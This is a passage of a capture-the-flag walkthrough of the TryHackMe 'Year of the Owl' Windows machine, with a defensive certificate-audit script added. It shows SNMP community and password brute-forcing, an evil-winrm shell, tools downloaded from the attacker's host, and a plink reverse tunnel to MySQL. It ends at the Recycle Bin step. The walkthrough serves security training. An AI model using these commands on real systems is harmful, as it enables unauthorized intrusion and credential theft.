Recon to foothold
When the labyrinth is before you and you lose your way, sometimes thinking outside the walls is the way forward
Let’s start with an nmap scan
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ nmap -A -T4 -p- -v 10.10.178.110
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-13 15:35 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Initiating Ping Scan at 15:35
Scanning 10.10.178.110 [2 ports]
Completed Ping Scan at 15:35, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:35
Completed Parallel DNS resolution of 1 host. at 15:35, 0.03s elapsed
Initiating Connect Scan at 15:35
Scanning 10.10.178.110 [65535 ports]
Discovered open port 3389/tcp on 10.10.178.110
Discovered open port 445/tcp on 10.10.178.110
Discovered open port 443/tcp on 10.10.178.110
Discovered open port 139/tcp on 10.10.178.110
Discovered open port 80/tcp on 10.10.178.110
Discovered open port 3306/tcp on 10.10.178.110
Connect Scan Timing: About 21.90% done; ETC: 15:37 (0:01:51 remaining)
Discovered open port 5985/tcp on 10.10.178.110
Connect Scan Timing: About 56.56% done; ETC: 15:37 (0:00:47 remaining)
Discovered open port 47001/tcp on 10.10.178.110
Completed Connect Scan at 15:37, 91.18s elapsed (65535 total ports)
Initiating Service scan at 15:37
Scanning 8 services on 10.10.178.110
Completed Service scan at 15:37, 12.75s elapsed (8 services on 1 host)
NSE: Script scanning 10.10.178.110.
Initiating NSE at 15:37
Completed NSE at 15:38, 40.08s elapsed
Initiating NSE at 15:38
Completed NSE at 15:38, 7.99s elapsed
Initiating NSE at 15:38
Completed NSE at 15:38, 0.00s elapsed
Nmap scan report for 10.10.178.110
Host is up (0.025s latency).
Not shown: 65527 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
|_SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host 'ip-10-9-5-160.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: YEAR-OF-THE-OWL
| NetBIOS_Domain_Name: YEAR-OF-THE-OWL
| NetBIOS_Computer_Name: YEAR-OF-THE-OWL
| DNS_Domain_Name: year-of-the-owl
| DNS_Computer_Name: year-of-the-owl
| Product_Version: 10.0.17763
|_ System_Time: 2020-11-13T20:37:51+00:00
| ssl-cert: Subject: commonName=year-of-the-owl
| Issuer: commonName=year-of-the-owl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-16T19:04:21
| Not valid after: 2021-03-18T19:04:21
| MD5: a4ad f32c 5473 eee3 2d2c ca88 c231 7879
|_SHA-1: 1824 b248 b428 857e 8ce6 f1f3 d60d 333a d679 5c5b
|_ssl-date: 2020-11-13T20:38:31+00:00; +29s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=11/13%Time=5FAEEE74%P=x86_64-pc-linux-gnu%r(N
SF:ULL,67,"c\0\0\x01\xffj\x04Host\x20'ip-10-9-5-160\.eu-west-1\.compute\.i
SF:nternal'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mari
SF:aDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 28s, deviation: 0s, median: 28s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-13T20:37:56
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 15:38
Completed NSE at 15:38, 0.00s elapsed
Initiating NSE at 15:38
Completed NSE at 15:38, 0.00s elapsed
Initiating NSE at 15:38
Completed NSE at 15:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.45 seconds
We can quickly try enumerating SMB
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ smbclient -L 10.10.178.110
Enter WORKGROUP\kali's password:
session setup failed: NT_STATUS_CONNECTION_DISCONNECTED
Ok, we’ll need credentials before we can go further there
Let’s have a look at the web page on port 80
Oh very nice indeed!
There are no comments in the page text, no robots.txt and no sneaky scripts. Let’s use gobuster to hunt for hidden directories
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ gobuster dir --url 10.10.178.110 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.178.110
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/13 15:37:15 Starting gobuster
===============================================================
/webalizer (Status: 403)
/phpmyadmin (Status: 403)
/licenses (Status: 403)
/server-status (Status: 403)
/con (Status: 403)
/aux (Status: 403)
[ERROR] 2020/11/13 15:39:42 [!] parse http://10.10.178.110/error_log: net/url: invalid control character in URL
/prn (Status: 403)
/server-info (Status: 403)
/Con (Status: 403)
===============================================================
2020/11/13 15:42:19 Finished
===============================================================
Ok, lots of things there, but nothing we can reach, at least not for now
There is also a web server on port 443; it appears to serve the same pages. Since it is HTTPS, we can look at the certificate though
Interesting, the cert is for localhost, which is not a very specific hostname. Some googling finds that this is considered to be a potential security risk
localhost is a poor choice to use as a development domain. There are critical bugs it introduces into an application:
- Depending on the browser and the context in which that browser is running (i.e. “app mode” vs “desktop mode” vs “kiosk mode”, etc) localhost does not follow security policies in an identical manner to true domains.
- Also, localhost will retain cookies, localStorage, etc that interferes with proper local development.
and
Some devices are misconfigured such that some network requests for localhost actually hit the local DNS. Not just in theory, but in practice - it has been seen in the wild. A router could have a DNS resolution for .localhost or localhost.homenetwork and depending on network settings of the router and device it could hijack the browse
Can we do something with that? Not at the moment at least!
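The certificate on 443 has more wrong with it than the hostname. As an added example (not part of the original write-up), this script parses the ssl-cert block exactly as nmap printed it above and reports what a defender would want fixed: the localhost CN, the self-signed issuer, the 1024-bit RSA key, the SHA-1 signature and the fact that the cert had already expired a year before the scan.

```python
"""Audit the `ssl-cert` block nmap printed for the port 443 service.

Added example, not from the original write-up. The sample input embedded
below is the ssl-cert block quoted from the scan above; the scan date comes
from the "Starting Nmap ... 2020-11-13" line.
"""
from datetime import datetime

# Sample input: the ssl-cert block for port 443, as nmap prints it.
NMAP_SSL_CERT_BLOCK = """\
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
|_SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
"""

# Date the scan was run (from the nmap banner above).
SCAN_DATE = datetime(2020, 11, 13)

# Minimum acceptable RSA modulus and signature algorithms treated as weak.
MIN_RSA_BITS = 2048
WEAK_SIG_ALGOS = ("md5", "sha1")


def parse_ssl_cert_block(block: str) -> dict:
    """Turn nmap's `| key: value` lines into a dict keyed by field name.

    The first line carries the script name as a prefix ("ssl-cert: Subject: ...")
    and the last line starts with "|_" instead of "| "; both are handled.
    """
    fields = {}
    for raw in block.splitlines():
        line = raw.lstrip("|_ ").strip()
        if line.startswith("ssl-cert:"):
            line = line[len("ssl-cert:"):].strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        fields[key.strip()] = value.strip()
    return fields


def cert_findings(fields: dict, scan_date: datetime = SCAN_DATE) -> list:
    """Return (severity, message) findings for a parsed certificate block."""
    findings = []

    subject = fields.get("Subject", "")
    issuer = fields.get("Issuer", "")
    if "commonName=localhost" in subject:
        findings.append(("high", "subject CN is 'localhost': it can never match the real hostname"))
    if subject and subject == issuer:
        findings.append(("medium", "self-signed certificate (subject equals issuer)"))

    if fields.get("Public Key type", "").lower() == "rsa":
        bits = int(fields.get("Public Key bits", "0"))
        if bits < MIN_RSA_BITS:
            findings.append(("high", f"RSA key is only {bits} bits (minimum {MIN_RSA_BITS})"))

    sig = fields.get("Signature Algorithm", "")
    if any(sig.lower().startswith(weak) for weak in WEAK_SIG_ALGOS):
        findings.append(("high", f"weak signature algorithm {sig}"))

    not_after = fields.get("Not valid after")
    if not_after:
        expiry = datetime.fromisoformat(not_after)
        if expiry < scan_date:
            days = (scan_date - expiry).days
            findings.append(("high", f"certificate expired {days} days before the scan"))

    return findings


if __name__ == "__main__":
    parsed = parse_ssl_cert_block(NMAP_SSL_CERT_BLOCK)
    for severity, message in cert_findings(parsed):
        print(f"[{severity}] {message}")
```

The RDP certificate on 3389 from the same scan (2048-bit RSA, SHA-256, valid until 2021) passes every check, which shows the problem is specific to the XAMPP-bundled cert.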
There is also an exposed MySQL server on port 3306, so let’s have a look at that
kali@kali:~$ mysql --host=10.10.178.110 -u root mysql --password=blah
ERROR 1130 (HY000): Host 'ip-10-9-5-160.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
Is there any way we can spoof our hostname to this box? It seems pretty likely that a hostname of localhost would be sufficient to get access, but on checking it’s pretty clear that mysql/mariadb is just doing a reverse lookup of our IP address, so there is no way to pretend we’re coming from 127.0.0.1!
There’s not a lot to work with here, so let’s try a UDP scan to see if there are any interesting services to look at
kali@kali:~$ sudo nmap -sU 10.10.178.110 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-13 16:43 EST
Nmap scan report for 10.10.178.110
Host is up.
All 1000 scanned ports on 10.10.178.110 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 202.67 seconds
Ok, 1000 ports open|filtered. Of course that doesn’t mean they’re not available, just that nothing answered the probe (nmap reports a UDP port as open|filtered when it gets no reply, because a silent open port and a filtered one look the same). Before we move on, let’s try a more intensive scan limited to just the top 20 or so UDP ports, to save time, and see if we get anything at all. From the nmap manual they are
Top 20 (most commonly open) UDP ports
- Port 631 (IPP)—Internet Printing Protocol.
- Port 161 (SNMP)—Simple Network Management Protocol.
- Port 137 (NETBIOS-NS)—One of many UDP ports for Windows services such as file and printer sharing.
- Port 123 (NTP)—Network Time Protocol.
- Port 138 (NETBIOS-DGM)—Another Windows service.
- Port 1434 (MS-SQL-DS)—Microsoft SQL Server.
- Port 445 (Microsoft-DS)—Another Windows Services port.
- Port 135 (MSRPC)—Yet Another Windows Services port.
- Port 67 (DHCPS)—Dynamic Host Configuration Protocol Server (gives out IP addresses to clients when they join the network).
- Port 53 (Domain)—Domain Name System (DNS) server.
- Port 139 (NETBIOS-SSN)—Another Windows Services port.
- Port 500 (ISAKMP)—The Internet Security Association and Key Management Protocol is used to set up IPsec VPNs.
- Port 68 (DHCPC)—DHCP client port.
- Port 520 (Route)—Routing Information Protocol (RIP).
- Port 1900 (UPNP)—Microsoft Simple Service Discovery Protocol, which enables discovery of Universal plug-and-play devices.
- Port 4500 (nat-t-ike)—For negotiating Network Address Translation traversal while initiating IPsec connections (during Internet Key Exchange).
- Port 514 (Syslog)—The standard UNIX log daemon.
- Port 49152 (Varies)—The first of the IANA-specified dynamic/private ports. No official ports may be registered from here up until the end of the port range (65536). Some systems use this range for their ephemeral ports, so services which bind a port without requesting a specific number are often allocated 49152 if they are the first program to do so.
- Port 162 (SNMPTrap)—Simple Network Management Protocol trap port (An SNMP agent typically uses 161 while an SNMP manager typically uses 162).
- Port 69 (TFTP)—Trivial File Transfer Protocol.
Let’s go for it
kali@kali:~$ sudo nmap -sU 10.10.178.110 -Pn --top-ports 20 -A -v
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-13 17:00 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:00
Completed Parallel DNS resolution of 1 host. at 17:00, 0.01s elapsed
Initiating UDP Scan at 17:00
Scanning 10.10.178.110 [20 ports]
Completed UDP Scan at 17:00, 5.14s elapsed (20 total ports)
Initiating Service scan at 17:00
Scanning 20 services on 10.10.178.110
Service scan Timing: About 5.00% done; ETC: 17:32 (0:30:43 remaining)
Completed Service scan at 17:01, 102.63s elapsed (20 services on 1 host)
Initiating OS detection (try #1) against 10.10.178.110
Retrying OS detection (try #2) against 10.10.178.110
Initiating Traceroute at 17:02
Completed Traceroute at 17:02, 9.05s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:02
Completed Parallel DNS resolution of 1 host. at 17:02, 0.01s elapsed
NSE: Script scanning 10.10.178.110.
Initiating NSE at 17:02
Completed NSE at 17:07, 320.54s elapsed
Initiating NSE at 17:07
Completed NSE at 17:07, 2.31s elapsed
Initiating NSE at 17:07
Completed NSE at 17:07, 0.00s elapsed
Nmap scan report for 10.10.178.110
Host is up.
PORT STATE SERVICE VERSION
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
Too many fingerprints match this host to give specific OS details
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 3.98 ms 10.9.0.1
2 ... 30
NSE: Script Post-scanning.
Initiating NSE at 17:07
Completed NSE at 17:07, 0.00s elapsed
Initiating NSE at 17:07
Completed NSE at 17:07, 0.00s elapsed
Initiating NSE at 17:07
Completed NSE at 17:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 449.81 seconds
Raw packets sent: 176 (12.377KB) | Rcvd: 1 (56B)
Being curious about the Rcvd: 1, we can watch the whole scan in wireshark. It turns out the one received packet isn’t even from the scanned host; rather it’s from the router at 10.9.0.1 giving us a ‘Type: 11 (Time-to-live exceeded)’ error after the host is pinged
We try probing those top-20 ports individually with the various enumeration tools that exist and eventually we find something!!
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.10.250.206
Scanning 1 hosts, 3219 communities
10.10.250.206 [openview] Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Ok, it seems that SNMP is open on port 161 with the community string openview
Foothold to user
Alright then, let’s see what we can see now that we have a foothold
We can use snmp-check to gather some data from the target
kali@kali:~$ snmp-check -c openview 10.10.250.206
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.250.206:161 using SNMPv1 and community 'openview'
[*] System information:
Host IP address : 10.10.250.206
Hostname : year-of-the-owl
Description : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Contact : -
Location : -
Uptime snmp : 01:11:41.92
Uptime system : 01:11:08.56
System date : 2020-11-14 15:22:40.6
Domain : WORKGROUP
[*] User accounts:
Guest
Jareth
Administrator
DefaultAccount
WDAGUtilityAccount
[*] Network information:
IP forwarding enabled : no
Default TTL : 128
TCP segments received : 128
TCP segments sent : 348
TCP segments retrans : 500
Input datagrams : 13425
Delivered datagrams : 12601
Output datagrams : 3208
[*] Network interfaces:
Interface : [ up ] Software Loopback Interface 1
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 1073 Mbps
MTU : 1500
In octets : 0
Out octets : 0
--snip--
[*] Network IP:
Id IP Address Netmask Broadcast
7 10.10.250.206 255.255.0.0 1
1 127.0.0.1 255.0.0.0 1
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 10.10.0.1 0.0.0.0 25
10.10.0.0 10.10.250.206 255.255.0.0 281
10.10.250.206 10.10.250.206 255.255.255.255 281
10.10.255.255 10.10.250.206 255.255.255.255 281
127.0.0.0 127.0.0.1 255.0.0.0 331
127.0.0.1 127.0.0.1 255.255.255.255 331
127.255.255.255 127.0.0.1 255.255.255.255 331
169.254.169.123 10.10.0.1 255.255.255.255 50
169.254.169.249 10.10.0.1 255.255.255.255 50
169.254.169.250 10.10.0.1 255.255.255.255 50
169.254.169.251 10.10.0.1 255.255.255.255 50
169.254.169.253 10.10.0.1 255.255.255.255 50
169.254.169.254 10.10.0.1 255.255.255.255 50
224.0.0.0 127.0.0.1 240.0.0.0 331
255.255.255.255 127.0.0.1 255.255.255.255 331
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 443 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 3306 0.0.0.0 0 listen
0.0.0.0 3389 0.0.0.0 0 listen
0.0.0.0 5985 0.0.0.0 0 listen
0.0.0.0 47001 0.0.0.0 0 listen
0.0.0.0 49664 0.0.0.0 0 listen
0.0.0.0 49665 0.0.0.0 0 listen
0.0.0.0 49666 0.0.0.0 0 listen
0.0.0.0 49667 0.0.0.0 0 listen
0.0.0.0 49668 0.0.0.0 0 listen
0.0.0.0 49670 0.0.0.0 0 listen
10.10.250.206 139 0.0.0.0 0 listen
[*] Listening UDP ports:
Local address Local port
0.0.0.0 123
0.0.0.0 161
0.0.0.0 3389
0.0.0.0 5353
0.0.0.0 5355
10.10.250.206 137
10.10.250.206 138
127.0.0.1 61529
[*] Network services:
Index Name
0 Power
1 mysql
2 Server
3 Themes
--snip--
67 Remote Desktop Services UserMode Port Redirector
68 Windows Defender Antivirus Network Inspection Service
[*] Processes:
Id Status Name Path Parameters
1 running System Idle Process
4 running System
68 running Registry
408 running smss.exe
492 running dwm.exe
--snip--
2980 running conhost.exe \??\C:\Windows\system32\ 0x4
3008 running httpd.exe C:\xampp\apache\bin\ -d C:/xampp/apache
3556 running CompatTelRunner.exe C:\Windows\system32\ -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:t1ZwsJvflU6MCw0+.2
3656 running NisSrv.exe
[*] Storage information:
Description : ["C:\\ Label: Serial Number 7c0c3814"]
Device id : [#<SNMP::Integer:0x000055ae1efbf640 @value=1>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055ae1efbd7a0 @value=4096>]
Memory size : 19.46 GB
Memory used : 15.19 GB
Description : ["Virtual Memory"]
Device id : [#<SNMP::Integer:0x000055ae1efa80a8 @value=2>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055ae1efa6280 @value=65536>]
Memory size : 3.12 GB
Memory used : 1.18 GB
Description : ["Physical Memory"]
Device id : [#<SNMP::Integer:0x000055ae1f034af8 @value=3>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055ae1f032ca8 @value=65536>]
Memory size : 2.00 GB
Memory used : 1.24 GB
[*] File system information:
Index : 1
Mount point :
Remote mount point : -
Access : 1
Bootable : 0
[*] Device information:
Id Type Status Descr
1 unknown running Microsoft XPS Document Writer v4
2 unknown running Microsoft Print To PDF
3 unknown running Unknown Processor Type
4 unknown unknown Software Loopback Interface 1
5 unknown unknown Microsoft 6to4 Adapter
6 unknown unknown Microsoft IP-HTTPS Platform Adapter
7 unknown unknown Microsoft Kernel Debug Network Adapter
8 unknown unknown Intel(R) 82574L Gigabit Network Connection
9 unknown unknown Microsoft Teredo Tunneling Adapter
10 unknown unknown AWS PV Network Device #0
11 unknown unknown AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter
12 unknown unknown AWS PV Network Device #0-QoS Packet Scheduler-0000
13 unknown unknown AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-
14 unknown running Fixed Disk
15 unknown running Fixed Disk
16 unknown running IBM enhanced (101- or 102-key) keyboard, Subtype=(0)
17 unknown unknown COM1:
[*] Software components:
Index Name
1 XAMPP
2 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325
3 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325
4 Amazon SSM Agent
5 Amazon SSM Agent
6 Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325
Ok, so we can confirm that it is a Windows host and we get a username Jareth
Let’s try using crackmapexec to find a password for this user then
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ crackmapexec winrm 10.10.250.206 -u 'Jareth' -p '/usr/share/wordlists/rockyou.txt'
WINRM 10.10.250.206 5985 NONE [*] http://10.10.250.206:5985/wsman
WINRM 10.10.250.206 5985 NONE [-] None\Jareth:123456 "Failed to authenticate the user Jareth with ntlm"
--snip--
WINRM 10.10.250.206 5985 NONE [+] None\Jareth:sarah (Pwn3d!)
Excellent, we have creds! Jareth:sarah
Let’s try these now in RDP
Ahh, it seems that Jareth doesn’t have the right to log in remotely via RDP! We have another possibility though, let’s see if evil-winrm can get us a shell over WinRM
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ ~/Tools/evil-winrm/evil-winrm.rb -u Jareth -p sarah -i 10.10.250.206
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated
*Evil-WinRM* PS C:\Users\Jareth\Documents>
Excellent, we’re in!
Let’s look in the usual place for a user flag
*Evil-WinRM* PS C:\Users\Jareth\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Jareth\Desktop> dir
Directory: C:\Users\Jareth\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 2:21 AM 80 user.txt
*Evil-WinRM* PS C:\Users\Jareth\Desktop> type user.txt
THM{REDACTED}
And we got it, #1:THM{REDACTED}
Privilege Escalation
Let’s pull winPEAS onto the target using Invoke-WebRequest
*Evil-WinRM* PS C:\Users\Jareth\Desktop> Invoke-WebRequest -uri "http://10.9.5.160:8888/winPEAS.bat" -OutFile "C:\Users\Jareth\Desktop\winPEAS.bat"
Picking out the interesting bits …as far as we know! 😄
- It seems UAC is on
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] UAC Settings <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
- We don’t seem to have much by the way of useful privileges
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
- We’re in the Remote Management Users group, what does that allow us to do?
Local Group Memberships *Remote Management Use*Users
Ahh, I think this might be the reason that we were able to get a shell via WinRM
- There is a ‘utility’ account that might be worth exploring
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] USERS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Jareth WDAGUtilityAccount
On a quick google this account is a normal built-in that is used by the system for Windows Defender Application Guard scenarios
- There doesn’t appear to be any creds accessible apart from the user we already have
We can try connecting to the mysql service now that we have a localhost connection. For this we need to
- Make a proxy connection that maps a port on our attack box to the target’s internal port 3306
- Run mysql against that local port
To do the first part of this we’ll use this Red Teamer’s guide. First we make a user sshproxy on our attack box, then upload plink, the command line SSH client from the PuTTY suite, and run it with the -R switch to create a remote port forward (the target connects out to our SSH server and asks it to listen on a port that is tunnelled back to the target’s 3306)
*Evil-WinRM* PS C:\Users\Jareth\Desktop> iwr -uri "http://10.9.5.160:8888/plink.exe" -outfile "plink.exe"
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\plink.exe sshproxy@10.9.5.160 -R 43306:localhost:3306
plink.exe : The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b:ab:04:68
If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the connection.
Store key in cache? (y/n) Connection abandoned.
Ok, so we’re not getting an opportunity to accept the host key interactively, so let’s specify it directly on the command line
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\plink.exe sshproxy@10.9.5.160 -R 43306:localhost:3306 -hostkey 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b:ab:04:68 -pw sshproxy
plink.exe : Using username "sshproxy".
+ CategoryInfo : NotSpecified: (Using username "sshproxy".:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Linux kali 5.8.0-kali3-amd64 #1 SMP Debian 5.8.14-1kali1 (2020-10-13) x86_64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov 15 10:53:41 2020 from 10.9.5.160
*Evil-WinRM* PS C:\Users\Jareth\Desktop>
Ok, now we get in but the connection disconnects immediately, possibly because we set up sshproxy to have no shell. Let’s try one more time with the -N parameter, which tells plink not to request a shell at all and just hold the forward open
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\plink.exe sshproxy@10.9.5.160 -R 43306:localhost:3306 -hostkey 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b:ab:04:68 -pw sshproxy -N
plink.exe : Using username "sshproxy".
+ CategoryInfo : NotSpecified: (Using username "sshproxy".:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Ok… that’s sort of hanging there, can we see an open port 43306 on the attack box?
kali@kali:~/Tools/putty$ sudo netstat -tulnp | grep 43306
tcp 0 0 127.0.0.1:43306 0.0.0.0:* LISTEN 256391/sshd: sshpro
tcp6 0 0 ::1:43306 :::* LISTEN 256391/sshd: sshpro
Excellent, now let’s try to connect with mysql. We have to specify --protocol TCP, as by default the mysql client connecting to localhost uses the Unix .sock file rather than the forwarded TCP port
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ mysql -u jareth -p -h localhost -P 43306 --protocol TCP
Enter password:
ERROR 1045 (28000): Access denied for user 'jareth'@'localhost' (using password: YES)
Ok, we have no connection for Jareth with the known creds
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ mysql -u root -p -h localhost -P 43306 --protocol TCP
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ mysql -u root -p -h localhost -P 43306 --protocol TCP
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Similarly we cannot get in as root either, trying both the default (no password) and sarah (in case of password reuse)
Let’s have a look in the Recycle Bin and see if there are any interesting files the user may have deleted
We can find the recycle bin in the drive root
